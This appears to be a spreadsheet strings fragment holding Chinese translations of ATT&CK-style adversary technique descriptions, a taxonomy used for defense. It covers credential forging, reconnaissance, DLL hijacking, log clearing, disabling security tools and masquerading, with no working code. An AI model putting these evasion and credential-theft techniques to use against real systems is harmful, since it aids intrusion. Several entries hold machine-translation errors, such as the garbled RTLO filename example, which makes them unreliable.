    <t>攻击者可以通过调用或强制用户通过他们可以拦截的机制自动提供身份验证信息来收集凭证材料。</t>
  </si>
  <si>
    <t>攻击者可能伪造可用于访问web应用程序或Internet服务的凭证材料。Web应用程序和服务（托管在云SaaS环境或内部部署服务器中）通常使用会话cookie、令牌或其他材料来验证和授权用户访问。</t>
  </si>
  <si>
    <t>攻击者可能伪造可用于访问web应用程序或Internet服务的web cookie。Web应用程序和服务（托管在云SaaS环境或内部部署服务器中）通常使用会话cookie来验证和授权用户访问。</t>
  </si>
  <si>
    <t>如果攻击者拥有有效的SAML令牌签名证书，则他们可以伪造具有任何权限声明和生存期的SAML令牌。SAML令牌的默认生存期为一小时，但有效期可以在条件的NOTONORFAFTER值中指定。。。标记中的元素。可以使用LifetimeTokenPolicy中的AccessTokenLifetime更改此值。伪造的SAML令牌使攻击者能够跨使用SAML 2.0作为SSO（单点登录）机制的服务进行身份验证。</t>
  </si>
  <si>
    <t>攻击者可能会收集有关受害者主机的信息，这些信息可以在瞄准过程中使用。有关主机的信息可能包括各种详细信息，包括管理数据（例如：名称、分配的IP、功能等）以及有关其配置的详细信息（例如：操作系统、语言等）。</t>
  </si>
  <si>
    <t>攻击者可能会收集有关受害者主机硬件的信息，这些信息可以在目标锁定期间使用。有关硬件基础设施的信息可能包括各种详细信息，例如特定主机上的类型和版本，以及可能表明增加了防御保护的其他组件的存在（例如：卡/生物识别读卡器、专用加密硬件等）。</t>
  </si>
  <si>
    <t>攻击者可能会收集有关受害者主机固件的信息，这些信息可在目标锁定期间使用。有关主机固件的信息可能包括各种详细信息，例如特定主机的类型和版本，这些信息可用于推断有关环境中主机的更多信息（例如：配置、用途、使用年限/补丁级别等）。</t>
  </si>
  <si>
    <t>攻击者可能会收集有关受害者的客户机配置的信息，这些信息可以在瞄准过程中使用。有关客户端配置的信息可能包括各种详细信息和设置，包括操作系统/版本、虚拟化、体系结构（例如：32或64位）、语言和/或时区。</t>
  </si>
  <si>
    <t>攻击者可能会收集有关受害者身份的信息，以便在瞄准过程中使用。有关身份的信息可能包括各种细节，包括个人数据（例如：员工姓名、电子邮件地址等）以及敏感细节，如凭据。</t>
  </si>
  <si>
    <t>攻击者可能会收集可以在瞄准过程中使用的凭证。攻击者收集的帐户凭据可能与目标受害者组织直接相关，或者试图利用用户在个人和企业帐户中使用相同密码的趋势。</t>
  </si>
  <si>
    <t>攻击者可能会收集在瞄准过程中可以使用的电子邮件地址。即使存在内部实例，组织也可能拥有面向公众的电子邮件基础设施和员工地址。</t>
  </si>
  <si>
    <t>攻击者可以收集员工姓名，以便在确定目标时使用。员工姓名可用于获取电子邮件地址，并帮助指导其他侦察工作和/或制作更可信的诱饵。</t>
  </si>
  <si>
    <t>攻击者可能会收集有关受害者网络的信息，这些信息可以在瞄准过程中使用。有关网络的信息可能包括各种细节，包括管理数据（例如：IP范围、域名等）以及有关其拓扑和操作的细节。</t>
  </si>
  <si>
    <t>攻击者可能会收集有关受害者的网络域的信息，这些信息可以在瞄准过程中使用。有关域名及其属性的信息可能包括各种详细信息，包括受害者拥有的域名、管理数据（例如：姓名、注册人等）以及更直接的可操作信息，如联系人（电子邮件地址和电话号码）、业务地址和姓名服务器。</t>
  </si>
  <si>
    <t>攻击者可能会收集有关受害者DNS的信息，这些信息可以在目标锁定过程中使用。DNS信息可能包括各种详细信息，包括注册名称服务器以及概述目标子域、邮件服务器和其他主机地址的记录。</t>
  </si>
  <si>
    <t>攻击者可能会收集有关受害者的网络信任依赖关系的信息，这些信息可以在目标确定过程中使用。有关网络信任的信息可能包括各种详细信息，包括已连接（并可能提升）网络访问的第二方或第三方组织/域（例如：托管服务提供商、承包商等）。</t>
  </si>
  <si>
    <t>攻击者可能会收集受害者的IP地址，以便在目标锁定期间使用。公共IP地址可以按块或一系列顺序地址分配给组织。有关分配的IP地址的信息可能包括各种详细信息，例如正在使用哪些IP地址。IP地址还可以使攻击者获得有关受害者的其他详细信息，例如组织规模、物理位置、互联网服务提供商，以及或其面向公众的基础设施的托管位置/方式。</t>
  </si>
  <si>
    <t>攻击者可能会收集有关受害者商业关系的信息，这些信息可以在瞄准过程中使用。有关组织业务关系的信息可能包括各种细节，包括已连接（并可能提升）网络访问的第二方或第三方组织/域（例如：托管服务提供商、承包商等）。这些信息还可能揭示受害者硬件和软件资源的供应链和运输路径。</t>
  </si>
  <si>
    <t>攻击者可能会收集有关受害者商业节奏的信息，这些信息可以在瞄准过程中使用。有关组织业务节奏的信息可能包括各种细节，包括一周中的运营时间/天数。这些信息还可能显示受害者硬件和软件资源的购买和装运时间/日期。</t>
  </si>
  <si>
    <t>攻击者可能会收集有关受害者组织内的身份和角色的信息，以便在锁定目标时使用。有关业务角色的信息可能会揭示各种可针对性的细节，包括关键人员的可识别信息，以及他们可以访问哪些数据/资源。</t>
  </si>
  <si>
    <t>攻击者可以收集有关组策略设置的信息，以确定权限提升的路径、域内应用的安全措施，并发现域对象中可被操纵或用于融入环境的模式。组策略允许集中管理Active Directory（AD）中的用户和计算机设置。组策略对象（GPO）是组策略设置的容器，由存储在可预测网络路径\\SYSVOL\\Policies\中的文件组成。</t>
  </si>
  <si>
    <t>攻击者可能会将计算机配件、计算机或网络硬件引入一个系统或网络，作为获取访问权限的载体。虽然威胁参与者使用的公开参考很少，但许多红色团队/渗透测试人员利用硬件添加进行初始访问。商业和开源产品可以利用被动网络窃听、网络流量修改（即中间的攻击者）、击键注入、通过DMA读取内核内存、向现有网络添加新的无线访问等功能。</t>
  </si>
  <si>
    <t>攻击者可能会试图隐藏与他们的行为相关的工件，以逃避检测。操作系统可能具有隐藏各种工件的功能，例如重要的系统文件和管理任务执行，以避免中断用户工作环境，并防止用户更改系统上的文件或功能。攻击者可能会滥用这些功能来隐藏文件、目录、用户帐户或其他系统活动等工件，以逃避检测。</t>
  </si>
  <si>
    <t>攻击者可能会将文件和目录设置为隐藏，以逃避检测机制。为了防止普通用户意外更改系统上的特殊文件，大多数操作系统都有“隐藏”文件的概念。当用户使用GUI浏览文件系统或在命令行上使用普通命令时，这些文件不会显示。用户必须明确要求通过一系列图形用户界面（GUI）提示或命令行开关（dir/a用于Windows，ls-a用于Linux和macOS）显示隐藏的文件。</t>
  </si>
  <si>
    <t>攻击者可能会使用隐藏用户来掩盖他们创建或修改的用户帐户的存在。当给定系统上有许多用户帐户时，普通用户可能想要隐藏用户，或者想要对系统上的其他用户隐藏一个帐户。</t>
  </si>
  <si>
    <t>攻击者可能会使用隐藏窗口将恶意活动隐藏在用户的视线之外。在某些情况下，应用程序执行操作时通常会显示的窗口可以隐藏。系统管理员可以利用这一点来避免在执行管理任务时中断用户工作环境。</t>
  </si>
  <si>
    <t>攻击者可能会使用NTFS文件属性隐藏其恶意数据以逃避检测。每个新技术文件系统（NTFS）格式化的分区都包含一个主文件表（MFT），该主文件表维护分区上每个文件/目录的记录。MFT条目中包含文件属性，例如扩展属性（EA）和数据（当存在多个数据属性时称为备用数据流（ADS）），可用于存储任意数据（甚至完整文件）。</t>
  </si>
  <si>
    <t>攻击者可能会使用隐藏的文件系统向用户和安全工具隐藏恶意活动。文件系统提供了一种从物理存储器存储和访问数据的结构。通常，用户通过允许他们访问文件和目录的应用程序与文件系统打交道，这些文件和目录是对其物理位置（例如：磁盘扇区）的抽象。标准文件系统包括FAT、NTFS、ext4和APFS。文件系统还可以包含其他结构，例如NTFS中的卷引导记录（VBR）和主文件表（MFT）。</t>
  </si>
  <si>
    <t>攻击者可能使用虚拟实例执行恶意操作以避免被检测。存在各种各样的虚拟化技术，允许模拟计算机或计算环境。通过在虚拟实例中运行恶意代码，攻击者可以从无法监视虚拟实例中活动的安全工具中隐藏与其行为相关的工件。此外，根据虚拟网络实现（例如：桥接适配器），虚拟实例生成的网络流量可能很难追溯到受损主机，因为IP地址和主机名可能与已知值不匹配。</t>
  </si>
  <si>
    <t>攻击者可以通过用良性数据替换VBA源代码来隐藏嵌入在MS Office文档中的恶意Visual Basic for Applications（VBA）有效负载。</t>
  </si>
  <si>
    <t>攻击者可能会使用电子邮件规则将入站电子邮件隐藏在受损用户的邮箱中。许多电子邮件客户端允许用户为各种电子邮件功能创建收件箱规则，包括将电子邮件移动到其他文件夹、将电子邮件标记为已读或删除电子邮件。可以在Windows系统中创建新的电子邮件规则，或通过InboxShell或Cmdlet等外部规则在客户端上修改。</t>
  </si>
  <si>
    <t>攻击者可能会滥用资源分叉来隐藏恶意代码或可执行文件，以逃避检测并绕过安全应用程序。资源分叉为应用程序提供了一种结构化的方式来存储资源，例如缩略图、菜单定义、图标、对话框和代码。使用ls-l@或xattr-l命令显示文件的扩展属性时，可以识别资源分叉的使用情况。资源分叉已被弃用，并被应用程序捆绑结构取代。非本地化资源放在应用程序包的顶层目录中，而本地化资源放在/resources文件夹中。</t>
  </si>
  <si>
    <t>攻击者可能通过劫持操作系统运行程序的方式来执行自己的恶意有效负载。劫持执行流可以用于持久性，因为这种劫持执行可能会随着时间的推移再次发生。攻击者还可能使用这些机制提升权限或逃避防御，例如应用程序控制或其他执行限制。</t>
  </si>
  <si>
    <t>攻击者可以通过劫持用于加载DLL的搜索顺序来执行自己的恶意有效负载。Windows系统使用一种常见的方法来查找需要加载到程序中的DLL。劫持DLL加载可能是为了建立持久性，以及提升权限和/或规避对文件执行的限制。</t>
  </si>
  <si>
    <t>攻击者可以通过侧向加载DLL来执行自己的恶意有效负载。与DLL搜索顺序劫持类似，侧向加载涉及劫持程序加载的DLL。但是，与仅仅在程序的搜索顺序内植入DLL，然后等待调用受害应用程序不同，攻击者可以通过植入DLL，然后调用执行其有效负载的合法应用程序，直接侧向加载其有效负载。</t>
  </si>
  <si>
    <t>攻击者可以通过在受害者应用程序运行时搜索的路径中放置一个带有预期名称的恶意动态库（dylib）来执行自己的有效负载。动态加载程序将根据搜索路径的顺序尝试查找动态库。dylibs的路径可以以@rpath作为前缀，这允许开发人员使用相对路径来根据可执行文件的位置指定运行时使用的搜索路径数组。此外，如果使用弱链接，例如LC_LOAD_weak_DYLIB函数，即使预期的DYLIB不存在，应用程序仍将执行。弱链接使开发人员能够在添加新API时在多个macOS版本上运行应用程序。</t>
  </si>
  <si>
    <t>攻击者可以通过劫持安装程序使用的二进制文件来执行自己的恶意有效负载。这些进程可以自动执行特定的二进制文件，作为其功能的一部分，或者执行其他操作。如果对包含目标二进制文件的文件系统目录的权限或对该二进制文件本身的权限设置不当，则可能会使用用户级权限用另一个二进制文件覆盖目标二进制文件，并由原始进程执行。如果原始进程和线程在更高权限级别下运行，那么替换的二进制文件也将在更高权限级别下执行，这可能包括系统。</t>
  </si>
  <si>
    <t>攻击者可能通过劫持动态链接器用于加载共享库的环境变量来执行自己的恶意有效负载。在程序的执行准备阶段，动态链接器从环境变量和文件中加载共享库的指定绝对路径，例如Linux上的LD_PRELOAD或macOS上的DYLD_INSERT_库。首先加载环境变量中指定的库，优先于具有相同函数名的系统库。开发人员经常使用这些变量来调试二进制文件，而无需重新编译、消除映射符号的冲突，以及在不更改原始库的情况下实现自定义函数。</t>
  </si>
  <si>
    <t>攻击者可能通过劫持用于加载库的环境变量来执行自己的恶意有效载荷。攻击者可能会将一个程序放在PATH环境变量中存储的目录列表中较早的条目中，当Windows在该路径列表中顺序搜索从脚本或命令行调用的二进制文件时，将执行该程序。</t>
  </si>
  <si>
    <t>攻击者可以通过劫持用于加载其他程序的搜索顺序来执行自己的恶意有效载荷。由于某些程序不使用完整路径调用其他程序，因此攻击者可能会将自己的文件放在调用程序所在的目录中，从而导致操作系统应调用程序的请求启动其恶意软件。</t>
  </si>
  <si>
    <t>攻击者可能通过劫持易受攻击的文件路径引用来执行自己的恶意有效负载。攻击者可以通过将一个可执行文件放在路径中更高级别的目录中，利用缺少周围引用的路径，以便Windows选择攻击者的可执行文件来启动。</t>
  </si>
  <si>
    <t>攻击者可能通过劫持服务使用的二进制文件来执行自己的恶意有效负载。攻击者可能会使用Windows服务权限中的缺陷来替换服务启动时执行的二进制文件。这些服务流程可以自动执行特定的二进制文件，作为其功能的一部分，或者执行其他操作。如果对包含目标二进制文件的文件系统目录的权限或对二进制文件本身的权限设置不正确，则可能会使用用户级权限用另一个二进制文件覆盖目标二进制文件，并由原始进程执行。如果原始进程和线程在更高权限级别下运行，那么替换的二进制文件也将在更高权限级别下执行，这可能包括系统。</t>
  </si>
  <si>
    <t>攻击者可能通过劫持服务使用的注册表项来执行自己的恶意有效负载。攻击者可能会利用与服务相关的注册表项权限中的缺陷，从最初指定的可执行文件重定向到他们控制的可执行文件，以便在服务启动时启动自己的代码。Windows将本地服务配置信息存储在HKLM\SYSTEM\CurrentControlSet\Services下的注册表中。存储在服务注册表项下的信息可以通过服务控制器、sc.exe、PowerShell或Reg等工具进行操作，以修改服务的执行参数。通过访问控制列表和用户权限控制对注册表项的访问。</t>
  </si>
  <si>
    <t>攻击者可能会利用COR_PROFILER环境变量劫持加载程序的程序的执行流。NET CLR。COR_PROFILER是一个。NET Framework的一项功能，允许开发人员指定一个非托管（或.NET外部）分析DLL加载到每个DLL中。NET进程，该进程加载公共语言运行库（CLR）。这些探查器用于监视、故障排除和调试由执行的托管代码。NET CLR。</t>
  </si>
  <si>
    <t>攻击者可能会恶意修改受害者环境的组件，以阻碍或禁用防御机制。这不仅会削弱防火墙和反病毒等预防性防御，还会削弱防御者用来审计活动和识别恶意行为的检测能力。这也可能涉及本机防御以及用户和管理员安装的补充功能。</t>
  </si>
  <si>
    <t>攻击者可能会修改和/或禁用安全工具，以避免可能检测到其恶意软件/工具和活动。这可能有多种形式，例如杀死安全软件进程或服务、修改/删除注册表项或配置文件以使工具无法正常运行，或使用其他方法干扰安全工具扫描或报告信息。</t>
  </si>
  <si>
    <t>攻击者可能会禁用Windows事件日志，以限制可用于检测和审核的数据。Windows事件日志记录用户和系统活动，如登录尝试、进程创建等。这些数据被安全工具和分析师用来生成检测结果。</t>
  </si>
  <si>
    <t>攻击者可能会破坏命令历史记录，以隐藏他们在受损系统上运行的命令。各种命令解释器跟踪用户在终端中输入的命令，以便用户可以追溯他们所做的事情。</t>
  </si>
  <si>
    <t>攻击者可能会禁用或修改系统防火墙，以绕过限制网络使用的控制。更改可能会禁用整个机制，以及添加、删除或修改特定规则。这可以通过多种方式完成，具体取决于操作系统，包括通过命令行、编辑Windows注册表项和Windows控制面板。</t>
  </si>
  <si>
    <t>攻击者可能会禁用或修改云环境中的防火墙，以绕过限制对云资源访问的控制。云防火墙与禁用或修改系统防火墙中描述的系统防火墙是分开的。</t>
  </si>
  <si>
    <t>攻击者可能会禁用云日志功能和集成，以限制在其活动中收集的数据并避免被检测。</t>
  </si>
  <si>
    <t>攻击者可能会滥用Windows安全模式来禁用端点防御。安全模式通过一组有限的驱动程序和服务启动Windows操作系统。在安全模式下启动Windows后，端点检测和响应（EDR）工具等第三方安全软件可能无法启动。安全模式有两种版本：安全模式和联网安全模式。在安全模式引导后，可以启动其他服务。</t>
  </si>
  <si>
    <t>攻击者可能会降级或使用过时、易受攻击和/或不支持更新的安全控制（如日志）的系统功能版本。例如，PowerShell 5+版本包括脚本块日志记录（SBL），它可以记录执行的脚本内容。但是，攻击者可能会试图执行不支持SBL的PowerShell早期版本，目的是在运行可能已检测到的恶意脚本时削弱防御。</t>
  </si>
  <si>
    <t>攻击者可能会在云或容器映像中植入恶意代码，以便在访问环境后建立持久性。亚马逊网络服务（AWS）、亚马逊机器映像（AMIs）、谷歌云平台（GCP）映像、Azure映像，以及Docker等流行的容器运行时都可以植入或后门。与上传恶意软件不同，这种技术侧重于攻击者在受害者环境中的注册表中植入图像。根据基础设施的配置方式，如果基础设施配置工具被指示始终使用最新映像，这可能会提供持久访问。</t>
  </si>
  <si>
    <t>攻击者可能会删除或更改主机系统上生成的工件，包括日志或捕获的文件，如隔离的恶意软件。日志的位置和格式是特定于平台或产品的，但标准操作系统日志被捕获为Windows事件或Linux/macOS文件，如Bash History和/var/log/*。</t>
  </si>
  <si>
    <t>攻击者可能会清除Windows事件日志以隐藏入侵活动。Windows事件日志是计算机警报和通知的记录。有三个系统定义的事件源：系统、应用程序和安全性，有五种事件类型：错误、警告、信息、成功审核和失败审核。</t>
  </si>
  <si>
    <t>攻击者可能会清除系统日志以隐藏入侵证据。macOS和Linux都通过系统日志跟踪系统或用户发起的操作。大多数本机系统日志记录存储在/var/log/目录下。此目录中的子文件夹按相关功能对日志进行分类，例如：</t>
  </si>
  <si>
    <t>除了清除系统日志，攻击者还可以清除受损帐户的命令历史记录，以隐藏入侵期间采取的行动。各种命令解释器跟踪用户在终端中输入的命令，以便用户可以追溯他们所做的事情。</t>
  </si>
  <si>
    <t>攻击者可能会删除其入侵行为留下的文件。恶意软件、工具或其他由攻击者在系统上丢弃或创建的非本机文件可能会留下痕迹，以指示在网络中做了什么以及如何做。删除这些文件可以在入侵期间进行，也可以作为入侵后过程的一部分，以尽量减少攻击者的足迹。</t>
  </si>
  <si>
    <t>攻击者可能会删除不再有用的共享连接，以清除其操作的痕迹。不再需要时，可以删除Windows共享驱动器和SMB/Windows管理员共享连接。Net是一个示例实用程序，可以使用Net use\system\share/delete命令删除网络共享连接。</t>
  </si>
  <si>
    <t>攻击者可能会修改文件时间属性，以隐藏新文件或对现有文件的更改。TimeTomping是一种修改文件时间戳（修改、访问、创建和更改时间）的技术，通常用于模拟同一文件夹中的文件。例如，这是在攻击者修改或创建的文件上进行的，以便法医调查员或文件分析工具不会注意到这些文件。</t>
  </si>
  <si>
    <t>攻击者可能会滥用允许命令执行的实用程序来绕过限制命令行解释器使用的安全限制。可以使用各种Windows实用程序执行命令，可能无需调用cmd。例如，Forfiles、Program Compatibility Assistant（pcalua.exe）、Windows Linux子系统（WSL）的组件以及其他实用程序可以从命令和脚本解释器、运行窗口或通过脚本调用程序和命令的执行。</t>
  </si>
  <si>
    <t>攻击者可能会将工具或其他文件从外部系统转移到受损环境中。文件可以通过命令和控制通道从外部攻击者控制的系统复制，以将工具带入受害者网络，或者通过与另一个工具（如FTP）的替代协议复制。文件也可以通过scp、rsync和sftp等本机工具在Mac和Linux上复制。</t>
  </si>
  <si>
    <t>攻击者可能会删除或删除内置操作系统数据，并关闭旨在帮助恢复损坏系统的服务，以防止恢复。操作系统可能包含有助于修复损坏系统的功能，例如备份目录、卷影副本和自动修复功能。攻击者可能会禁用或删除系统恢复功能，以增强数据破坏和数据加密的影响。</t>
  </si>
  <si>
    <t>攻击者可能会使用捕获用户输入的方法来获取凭据或收集信息。在正常的系统使用过程中，用户通常会向不同的位置提供凭据，例如登录页面/门户或系统对话框。输入捕获机制可能对用户是透明的（例如凭证API挂钩），或者依赖于欺骗用户向他们认为是真正的服务提供输入（例如Web门户捕获）。</t>
  </si>
  <si>
    <t>攻击者可能会记录用户击键，以便在用户键入凭据时拦截凭据。当操作系统凭据转储工作无效时，密钥记录可能用于获取新访问机会的凭据，并且可能需要攻击者在相当长的一段时间内拦截系统上的击键，然后才能成功捕获凭据。</t>
  </si>
  <si>
    <t>攻击者可能会模仿常见的操作系统GUI组件，用看似合法的提示提示用户输入凭据。当执行的程序需要比当前用户上下文中更多的权限时，操作系统通常会提示用户提供适当的凭据，以授权任务的提升权限（例如：绕过用户帐户控制）。</t>
  </si>
  <si>
    <t>攻击者可能会在面向外部的门户（如VPN登录页面）上安装代码，以捕获和传输试图登录该服务的用户的凭据。例如，在用户登录到服务之前，受损的登录页面可能会记录提供的用户凭据。</t>
  </si>
  <si>
    <t>攻击者可能会连接到Windows应用程序编程接口（API）函数以收集用户凭据。恶意挂接机制可能会捕获API调用，这些调用包括显示用户身份验证凭据的参数。与Keylogging不同，该技术专门关注API函数，其中包含显示用户凭据的参数。挂接涉及将调用重定向到这些函数，可以通过以下方式实现：</t>
  </si>
  <si>
    <t>攻击者可能会滥用进程间通信（IPC）机制来执行本地代码或命令。进程通常使用IPC来共享数据、相互通信或同步执行。IPC还常用于避免死锁等情况，死锁发生在进程处于循环等待模式时。</t>
  </si>
  <si>
    <t>攻击者可以使用Windows组件对象模型（COM）执行本地代码。COM是本机Windows应用程序编程接口（API）的进程间通信（IPC）组件，支持软件对象或实现一个或多个接口的可执行代码之间的交互。通过COM，客户端对象可以调用服务器对象的方法，这些对象通常是二进制动态链接库（DLL）或可执行文件（EXE）。远程COM执行由分布式组件对象模型（DCOM）等远程服务提供便利。</t>
  </si>
  <si>
    <t>攻击者可以使用Windows动态数据交换（DDE）执行任意命令。DDE是一种客户端-服务器协议，用于应用程序之间的一次性和/或连续进程间通信（IPC）。一旦建立了链接，应用程序就可以自主地交换由字符串、热数据链接（数据项更改时的通知）、热数据链接（数据项更改的副本）和命令执行请求组成的事务。</t>
  </si>
  <si>
    <t>在同一组织内的其他用户已经可以访问环境中的帐户或系统后，攻击者可能会使用内部网络钓鱼来获取更多信息，或利用这些用户进行攻击。内部网络钓鱼是一种多阶段攻击，通过使用以前安装的恶意软件控制用户的设备或通过泄露用户的帐户凭据来拥有电子邮件帐户。攻击者试图利用可信的内部帐户来增加诱骗目标落入网络钓鱼企图的可能性。</t>
  </si>
  <si>
    <t>攻击者可能会试图操纵其工件的功能，使其在用户和/或安全工具看来合法或无害。伪装是指为了逃避防御和观察而操纵或滥用合法或恶意对象的名称或位置。这可能包括操纵文件元数据、诱骗用户错误识别文件类型，以及提供合法的任务或服务名称。</t>
  </si>
  <si>
    <t>攻击者可能会试图模仿有效代码签名的特征，以增加欺骗用户、分析师或工具的机会。代码签名提供了开发人员提供的二进制文件的真实性级别，并保证二进制文件未被篡改。攻击者可以从已签名的程序中复制元数据和签名信息，然后将其用作未签名程序的模板。带有无效代码签名的文件将无法通过数字签名验证检查，但它们对用户来说可能更合法，安全工具可能会不正确地处理这些文件。</t>
  </si>
  <si>
    <t>攻击者可能会滥用从右到左的覆盖（RTLO或RLO）字符（U+202E）来伪装字符串和/或文件名，使其看起来是良性的。RTLO是一个非打印Unicode字符，它会导致后面的文本以相反的方式显示。例如，一个名为March 25\u202Excod的Windows屏幕保护程序可执行文件。scr将显示为3月25日rcs。docx。名为photo_high_re\u202Egnp的JavaScript文件。js将显示为photo_high_resj。巴布亚新几内亚。</t>
  </si>
  <si>
    <t>攻击者可能会重命名合法的系统实用程序，以试图规避与这些实用程序的使用有关的安全机制。针对攻击者能够滥用的系统实用程序，可以建立安全监控机制。通过在使用前重命名实用程序（例如：rename rundll32.exe），可以绕过这些安全机制。另一种情况是，合法实用程序被复制或移动到其他目录并重命名，以避免基于从非标准路径执行的系统实用程序进行检测。</t>
  </si>
  <si>
    <t>攻击者可能会试图操纵任务或服务的名称，使其看起来合法或友好。任务调度器或systemd执行的任务/服务通常会给出一个名称和/或描述。Windows服务将有一个服务名和一个显示名。许多良性任务和服务都有共同的名称。攻击者可能会给出与合法任务或服务相似或相同的任务或服务名称。</t>
  </si>
  <si>
    <t>在命名/放置合法文件或资源时，攻击者可能会匹配或近似合法文件或资源的名称或位置。这样做是为了逃避防御和观察。这可以通过将一个可执行文件放在一个通常受信任的目录（例如System32下）或给它一个合法的、受信任的程序（例如svchost.exe）的名称来实现。在容器化环境中，这也可以通过在名称空间中创建一个与容器盒或集群的命名约定相匹配的资源来实现。或者，给定的文件或容器图像名称可能与合法程序/图像或无害的东西非常接近。</t>
  </si>
  <si>
    <t>攻击者可以通过更改文件扩展名来隐藏程序的真实文件类型。对于某些文件类型（特别是不适用于.app扩展名），在文件名末尾添加空格将改变操作系统处理文件的方式。</t>
  </si>
  <si>
    <t>攻击者可能会滥用文件名中的双扩展名来伪装真实的文件类型。文件名可能包含一个辅助文件类型扩展名，该扩展名可能只会导致显示第一个扩展名（例如：file.txt.exe在某些视图中可能仅显示为file.txt）。但是，第二个扩展名是真正的文件类型，它决定了文件的打开和执行方式。真正的文件扩展名可能被操作系统隐藏在文件浏览器（例如：explorer.exe）中，以及使用或类似于系统策略配置的任何软件中。</t>
  </si>
  <si>
    <t>攻击者可能会修改身份验证机制和流程，以访问用户凭据，或以其他方式不正当地访问帐户。身份验证过程由机制处理，例如Windows上的本地安全身份验证服务器（LSASS）进程和安全帐户管理器（SAM）、基于Unix的系统上的可插拔身份验证模块（PAM）以及MacOS系统上的授权插件，它们负责收集、存储和验证凭据。通过修改身份验证过程，攻击者可以在不使用有效帐户的情况下对服务或系统进行身份验证。</t>
  </si>
  <si>
    <t>攻击者可能会在域控制器上修补身份验证过程，以绕过典型的身份验证机制并启用对帐户的访问。</t>
  </si>
  <si>
    <t>攻击者可能会将恶意密码过滤器动态链接库（DLL）注册到身份验证过程中，以在验证时获取用户凭据。</t>
  </si>
  <si>
    <t>攻击者可能会修改可插拔身份验证模块（PAM）以访问用户凭据，或启用对帐户的不正当访问。PAM是一个由配置文件、库和可执行文件组成的模块化系统，用于指导许多服务的身份验证。最常见的身份验证模块是pam_unix。因此，它在/etc/passwd和/etc/shadow中检索、设置和验证帐户身份验证信息。</t>
  </si>
  <si>
    <t>攻击者可能会使用补丁系统映像在操作系统中硬编码密码，从而绕过网络设备上本地帐户的本机身份验证机制。</t>
  </si>
  <si>
    <t>攻击者可能会试图修改云帐户的计算服务基础设施以逃避防御。对计算服务基础架构的修改可以包括创建、删除或修改一个或多个组件，如计算实例、虚拟机和快照。</t>
  </si>
  <si>
    <t>攻击者可能会在云账户内创建快照或数据备份，以逃避防御。快照是现有云计算组件（如虚拟机（VM）、虚拟硬盘驱动器或卷）的时间点拷贝。攻击者可能会利用权限创建快照，以绕过阻止访问现有计算服务基础设施的限制，而不是在还原云实例中，攻击者可能会还原到快照以逃避检测并删除其存在的证据。</t>
  </si>
  <si>
    <t>攻击者可能会在云帐户的计算服务中创建新实例或虚拟机（VM），以逃避防御。创建新实例可能会允许攻击者绕过防火墙规则和当前驻留在帐户中的实例上的权限。攻击者可能会在一个帐户中创建一个或多个卷的快照，创建一个新实例，装载快照，然后应用限制较少的安全策略从本地系统收集数据或用于远程数据转移。</t>
  </si>
  <si>
    <t>攻击者可能会在执行恶意活动后删除云实例，以逃避检测并移除其存在的证据。如果实例或虚拟机无法恢复，删除该实例或虚拟机可以删除有价值的取证工件和其他可疑行为的证据。</t>
  </si>
  <si>
    <t>攻击者可能会在执行恶意活动后恢复对云实例所做的更改，以试图逃避检测并删除其存在的证据。在高度虚拟化的环境中，如基于云的基础设施，这可以通过云管理仪表板或云API恢复虚拟机（VM）或数据存储快照来实现。</t>
  </si>
  <si>
    <t>攻击者可能会与Windows注册表交互，以隐藏注册表项中的配置信息，删除信息作为清理的一部分，或作为其他技术的一部分，以帮助持久性和执行。</t>
  </si>
  <si>
    <t>攻击者可能会改变嵌入式网络设备的操作系统，以削弱防御能力，并为自己提供新的能力。在这样的设备上，操作系统通常是单片的，大多数设备功能和能力都包含在一个文件中。</t>
  </si>
  <si>
    <t>攻击者可能会修改网络设备的操作系统，以引入新功能或削弱现有防御。有些网络设备是用单片结构构建的，其中整个操作系统和设备的大部分功能都包含在一个文件中。攻击者可能会在存储中更改此文件，以便在将来的引导中加载，或在运行时在内存中更改。</t>
  </si>
  <si>
    <t>攻击者可能会安装网络设备的旧版本操作系统，以削弱安全性。网络设备上较旧的操作系统版本通常具有较弱的加密密码，一般来说，防御功能更新较少。</t>
  </si>
  <si>
    <t>攻击者可能会创建多个指挥和控制阶段，这些阶段在不同条件下或特定功能下使用。使用多个阶段可能会混淆命令和控制通道，使检测更加困难。</t>
  </si>
  <si>
    <t>攻击者可能会与本机操作系统应用程序编程接口（API）交互以执行行为。本机API提供了一种可控的方法，可以调用内核中的低级操作系统服务，例如涉及硬件/设备、内存和进程的服务。操作系统在系统引导期间（其他系统组件尚未初始化时）以及在日常操作期间执行任务和请求时，都会利用这些本机API。</t>
  </si>
  <si>
    <t>攻击者可能通过破坏周边网络设备来跨越网络边界。违反这些设备可能会使攻击者绕过对流量路由的限制，否则这些限制会将受信任和不受信任的网络分开。</t>
  </si>
  <si>
    <t>攻击者可以通过修改网络设备的网络地址转换（NAT）配置来跨越网络边界。对NAT的恶意修改可能会使攻击者绕过对流量路由的限制，否则会将受信任和不受信任的网络分开。</t>
  </si>
  <si>
    <t>攻击者可能会执行网络拒绝服务（DoS）攻击，以降低或阻止目标资源对用户的可用性。网络拒绝服务可以通过耗尽服务所依赖的网络带宽来执行。示例资源包括特定网站、电子邮件服务、DNS和基于web的应用程序。观察到攻击者出于政治目的进行网络拒绝服务攻击，并支持其他恶意活动，包括分心、黑客活动和勒索。</t>
  </si>
  <si>
    <t>攻击者可能会试图通过直接向目标发送大量网络流量来造成拒绝服务（DoS）。直接网络洪水是指一个或多个系统用于向目标服务的网络发送大量网络数据包。几乎任何网络协议都可以用于泛洪。通常使用UDP或ICMP等无状态协议，但也可以使用TCP等有状态协议。</t>
  </si>
  <si>
    <t>攻击者可能会试图获取远程主机上运行的服务列表，包括那些可能容易受到远程软件攻击的服务。获取这些信息的方法包括端口扫描和漏洞扫描，使用系统上自带的工具进行扫描。</t>
  </si>
  <si>
    <t>攻击者可能会嗅探网络流量以捕获有关环境的信息，包括通过网络传递的身份验证材料。网络嗅探是指使用系统上的网络接口来监视或捕获通过有线或无线连接发送的信息。攻击者可能会将网络接口置于混杂模式，以被动地通过网络访问传输中的数据，或使用span端口捕获更多数据。</t>
  </si>
  <si>
    <t>攻击者可以使用非应用层协议在主机和C2服务器之间或网络中受感染主机之间进行通信。可能的协议列表非常广泛。具体示例包括使用网络层协议，如互联网控制消息协议（ICMP），传输层协议，如用户数据报协议（UDP），会话层协议，如套接字安全协议（SOCKS），以及重定向/隧道协议，如LAN串行协议（SOL）。</t>
  </si>
  <si>
    <t>攻击者可以使用通常不相关的协议和端口配对进行通信。例如，端口8088或端口587上的HTTPS与传统端口443不同。攻击者可能会更改协议使用的标准端口，以绕过网络数据的过滤或混淆分析/解析。</t>
